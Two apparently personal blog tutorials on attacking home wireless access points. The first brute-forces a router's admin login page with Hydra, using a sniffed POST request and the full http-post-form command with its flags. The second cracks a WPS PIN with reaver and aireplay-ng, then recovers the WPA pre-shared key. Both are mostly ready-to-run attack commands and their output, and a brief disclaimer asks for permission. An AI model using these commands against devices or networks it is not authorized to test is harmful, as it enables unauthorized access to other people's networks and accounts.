Brute-forcing with Hydra

Hydra is a great tool for brute-forcing. With this tool it is possible to brute-force most websites and protocols.

Protocols supported:
AFP, Cisco AAA, Cisco auth, Cisco enable, CVS, Firebird, FTP, HTTP-FORM-GET, HTTP-FORM-POST, HTTP-GET, HTTP-HEAD, HTTP-PROXY, ICQ, IMAP, IRC, LDAP2, LDAP3, MS-SQL, MYSQL, NCP, NNTP, Oracle, Oracle-Listener, Oracle-SID, PC-Anywhere, PCNFS, POP3, POSTGRES, RDP, REXEC, RLOGIN, RSH, SAP/R3, SIP, SMB, SMTP, SMTP-Enum, SNMP, SOCKS5, SSH(v1 and v2), Subversion, Teamspeak (TS2), Telnet, VMware-Auth, VNC and XMPP.
Can be found here: Hydra (http://www.thc.org/thc-hydra)

I dediced to see if it possible to brute-force my home AccessPoint administation login page.
Below is what i did.
First i started to examine the login page.

Viewing the source of the login-page to see if i could find any clues, find out what authentication it uses.
Basic, form-based etc.. There are a few ways of finding this out.
Using wireshark and intercept a login session gives a LOT of useful information.
Tried to login with a password while sniffing the traffic with wireshark, the password was incorrect (as suspected), but from this information we can see what variables are used for logging in.
Analyzing the sniffer output with "Follow TCP stream" i could see the following:
 POST /login.cgi HTTP/1.1 Host: 10.10.10.10 User-Agent: Mozilla/5.0 (X11; Linux i686; rv:14.0) Gecko/20100101 Firefox/14.0.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip, deflate Connection: keep-alive Referer: http://10.10.10.10/login.html Content-Type: application/x-www-form-urlencoded Content-Length: 76 page=&logout=&action=submit&pws=dGVzdA%3D%3D&itsbutton1=Submit&h_language=en HTTP/1.0 200 OK Server: IP_SHARER WEB 1.0 Content-type: text/html <link href="styles.css" rel="stylesheet" type="text/css"></link><script language="Javascript" src="language_en.js"></script><script language="JavaScript" src="showmenu.js"></script><script language="Javascript" src="base64.js"></script><script language="javascript" type="text/javascript"> strHtml='<title>'+lo1+'</title>'; dw(strHtml); <!-- var wanStatus.='Up'; var helpItem .='Login'; var menuSection.=''; var menuItem.=''; var isRouter.='1' ? '1' : '0'; var.isPS..='' ? '' : '0'; var isAPmode if('vlan1' =='' || '1'=='0') { .isAPmode='1'; } else { .isAPmode='0'; } function logoutF() { .document.tF.logout.value=1; .document.tF.submit(); .return true; } function doSubmit() { document.tF.action.value = "submit"; /* encode username and password with Base64 algorithm */ if(document.tF.pws.value != "") { document.tF.pws.value = base64encode(document.tF.pws.value); } checkfw(); } function checkfw() { ..if(''=='1'){ ..newwin=window.open('chk_wait.html',"Firmware","toolbar=no,location=no,directories=no,status=no,menubar=no,scrollbars=yes,width=395,height=200,resizable=0"); ..newwin.focus(); } } //--> </script><form action="login.cgi" method="post" name="tF" onsubmit="doSubmit()"> <input name="page" type="hidden" /><input name="logout" type="hidden" /><input name="action" type="hidden" /><script language="javascript" type="text/javascript"> showHead(wanStatus,helpItem,isRouter,isPS); showmenu(menuSection,menuItem,isRouter,isPS,isAPmode) </script> <td class="head_bold" height="100%" valign="top" width="99%"><br />    <script language="javascript" type="text/javascript">dw(lo1);</script> <br /> <br /> <table border="0">. <tbody> <tr>... <td width="5"></td>... <td><table align="left" border="0" cellpadding="0" cellspacing="5" style="width: 480px;"><tbody> <tr><td height="41" width="69"></td><td class="body" colspan="2" height="41"><script language="javascript" type="text/javascript">dw(lo2);</script></td></tr> <tr><td width="69"></td><td width="146"></td><td width="250"></td></tr> <tr><td width="69"></td><td class="bold_body" width="146"><script language="javascript" type="text/javascript">dw(lo3);</script></td><td width="250"><input maxlength="12" name="pws" size="9" type="password" /> </td></tr> <tr><td width="69"></td><td class="more" colspan="2"><script language="javascript" type="text/javascript">dw(lo4);</script></td></tr> <tr><td width="69"></td><td colspan="2"></td></tr> <tr><td width="69"></td><td align="middle" colspan="2"><script language="javascript" type="text/javascript">strHtml='<input type="reset" name="itsbutton0" value="'+Clear+'" style="{width:120px;}" class="submitBtn" onMouseOver="window.status=\'Clear\'; return true;" onMouseOut="window.status=\'\'; return true;">  '; ..dw(strHtml); ..strHtml='<input type="submit" name="itsbutton1" value="'+Submit+'" style="{width:120px;}" class="submitBtn">'; ..dw(strHtml);</script><br /> <br /> <span style="color: red; font-family: Arial; font-size: small;"><script language="javascript" type="text/javascript">dw(wrhtpsswd)</script></span></td></tr> </tbody></table> </td></tr> </tbody></table> </td></form> <input name="h_language" type="hidden" value="en" /><script language="javascript" type="text/javascript">showTail()</script>

I was looking for what happens after the submit button was pressed and also what is sent in HTTP-POST. Found the variable pws indicating that this is used for password input.

<input maxlength="12" name="pws" size="9" type="password" /> page=&logout=&action=submit&pws=dGVzdA%3D%3D&itsbutton1=Submit&h_language=enHTTP/1.0 200 OK <input type="submit" name="itsbutton1" value="'+Submit+'" style="{width:120px;}" class="submitBtn">'; ..dw(strHtml);</script><br /> <br /> <span style="color: red; font-family: Arial; font-size: small;"><script language="javascript" type="text/javascript">dw(wrhtpsswd)</script> Found an interesting variable: "dw(wrhtpsswd)" What does this do?
As we can see the password is base64 encoded as it is sent to the AP.
We can see that the length is 9 characters, max size is 12 characters.

Next step was further analysis with Mantra to examine web content.
DOM tab is an excellent way of analyzing variables and their associations.

This parameter wrhtpsswd sounds familiar. Incorrect password...
For a successful attack with Hydra we need to know the variable that submits the password and string included with it.
We also need to know the error message sent to us when entering an incorrect password.

From wireshark output we could not clearly see the Incorrect password message, but instead the AP sends a dw(wrhtpsswd) that DOM identified as the "Incorrect Password, Please confirm your password and try again" message.

Awesome, we can now go ahead and start the attack.
hydra -l "" -P PASSWORDS.TXT -t 1 -f -v -V 10.10.10.10 http-post-form /login.cgi:"page=&logout=&action=submit&pws=^PASS^%3D&itsbutton1=Submit&h_language=en":wrhtpsswd hydra parameters:
-l "" # There is no username required
-P PASSWORDS.TXT # Password file (in base64 encoded format)
-t #How many simultanious tasks
-f # Exit after the first found password
-v / -V # Verbose. Show every password combination
IP-address # you know
http-post-form # Method used
/login.cgi # The login page of the AP
"page=&logout=&action=submit # The string sent simulating a click on Submit button &pws=^PASS^%3D&itsbutton1=Submit&h_language=en" #pws from PASS in PASSWORDS.TXT
wrhtpsswd # The string to look for in the response when an incorrect password is entered

Hydra v7.3 (c)2012 by van Hauser/THC & David Maciejak - for legal purposes only Hydra (http://www.thc.org/thc-hydra) [DATA] 1 task, 1 server, 11638706 login tries (l:1/p:11638706), ~11638706 tries per task [DATA] attacking service http-post-form on port 80 [VERBOSE] Resolving addresses ... done [ATTEMPT] target 10.10.10.10 - login "" - pass "Q3J1bmNo" - 1 of 11638706 [child 0] [ATTEMPT] target 10.10.10.10 - login "" - pass "IHdpbGwg" - 2 of 11638706 [child 0] [ATTEMPT] target 10.10.10.10 - login "" - pass "bm93IGdl" - 3 of 11638706 [child 0] [ATTEMPT] target 10.10.10.10 - login "" - pass "bmVyYXRl" - 4 of 11638706 [child 0] [80][www-form] host: 10.10.10.10 login: password: XXXXXXXXXX [STATUS] attack finished for 10.10.10.10 (valid pair found) 1 of 1 target successfuly completed, 1 valid password found Awesome! Mission accomplished!

Hydra can be very time consuming depending on the size of the wordlist. A lot of options you can tweak for best timing and results. Play with it. Anything is possible, if not try harder.

A good source for common password lists can be obtained from SkullSecurity.
http://www.skullsecurity.org/wiki/index.php/Passwords

If you need to create your own custom password list Crunch is the way to go.
Excellent tool also included in Backtrack distributions or download it from Sourceforge.
http://sourceforge.net/projects/crunch-wordlist/

A good how-to can be found here.
http://adaywithtape.blogspot.se/2011/05/creating-wordlists-with-crunch-v30.html


Til next time. Bye for now!

/M

Wireless Hacking: Hacking WPS enabled AccessPoints

Just when you think you are safe with WPA2 and a PSK over 20 characters long something like this comes along.

It seems that most vendors have WPS enabled as a default setting, so was my Belkin home AP.

In this tutorial i will go through the steps of how i hacked my WPS enabled AccessPoint.

For more information about WPS (Wifi protected Setup) see:

http://en.wikipedia.org/wiki/Wi-Fi_Protected_Setup

Prerequisites:
- A wireless card supporting monitor mode
- Backtrack distribution: (I used Backtrack 5 R2) or
  Reaver WPS from http://code.google.com/p/reaver-wps/

First you need to set your wireless card in monitor mode:
root@bt:~/wlan# airmon-ng start wlan2

To find WPS enabled accesspoints we can use the command "wash" included in Backtrack 5

This command also shows if the WPS is locked, the channel the AP is running on and the BSSID and ESSID of the AP as well as RSSI which is the receive signal strength.

root@bt:~/wlan# wash -i mon0 Wash v1.4 WiFi Protected Setup Scan Tool Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <cheffner@tacnetsol.com> BSSID Channel RSSI WPS Version WPS Locked ESSID ------------------------------------------------------------------------------------------- XX:XX:XX:XX:XX:XX 6 -30 1.0 No SSID-1

Above we see an AP on Channel 6 with ESSID: SSID-1 that has WPS version 1.0 enabled and RSSI of -30 which means we are close to the AP.

Brute forcing WPS PIN:

open 2 command windows.

In window 1 run:

root@bt:~/wlan# reaver -i mon0 -b XX:XX:XX:XX:XX:XX -c 6 -N -E -A Reaver v1.4 WiFi Protected Setup Attack Tool Copyright (c) 2011, Tactical Network Solutions, Craig Heffner cheffner@tacnetsol.com [+] Waiting for beacon from XX:XX:XX:XX:XX:XX [+] Associated with XX:XX:XX:XX:XX:XX (ESSID: SSID-1) [+] 0.05% complete @ 2012-05-28 23:07:59 (10 seconds/pin) ...big snip...this will take many hours to complete..

Explainations to reaver command-line : -c channel, -A no association, -E Send EAP terminate, -N no acks, -vv very verbose (if you want to see all login attempts)



In window 2 run: root@bt:~/wlan# aireplay-ng -1 5 -a XX:XX:XX:XX:XX:XX mon0 No source MAC (-h) specified. Using the device MAC (00:C0:C4:52:A7:47) 23:01:26  Waiting for beacon frame (BSSID: XX:XX:XX:XX:XX:XX) on channel 6 23:01:26  Sending Authentication Request (Open System) [ACK] 23:01:26  Authentication successful 23:01:26  Sending Association Request [ACK] 23:01:26  Association successful :-) (AID: 1)

You might need to test the appropriate timing values depending on how close you are to the AP.

After a long while you should see this in window 1 [+] Associated with XX:XX:XX:XX:XX:XX (ESSID: SSID-1) [+] WPS PIN: '41234568' [+] WPA PSK: 'myverylongpresharedkeyconfiguredintheap' [+] AP SSID: 'SSID-1'

For some reason i do not always get the WPA PSK echoed out like above.
What you can do then is to test the PIN with:

reaver -i mon0 -b XX:XX:XX:XX:XX:XX -c 6 -p <PIN>

After the PIN is discovered and verified. Get WPA-PSK with the below method.

Create a wpa_supplicant.conf including the lines below

ctrl_interface=/var/run/wpa_supplicant ctrl_interface_group=0 update_config=1

Run wpa_supplicant

wpa_supplicant -Dwext -i wlan2 -c ./wpa_supplicant.conf -B
Run wpa_cli

wpa_cli wps_reg <BSSID> <PIN>   # wait for CONNECTED

save_config

Check your saved wpa_supplicant.conf with

cat wpa_supplicant.conf

It should now show you the PSK in clear text.


Hope you find the above useful.

Note:
I wrote this tutorial for reference and in good intentions.
Before you go ahead and hack your neighbours AP ask for permission!
I am not responsible what you do with the above information!
Cheers.

/M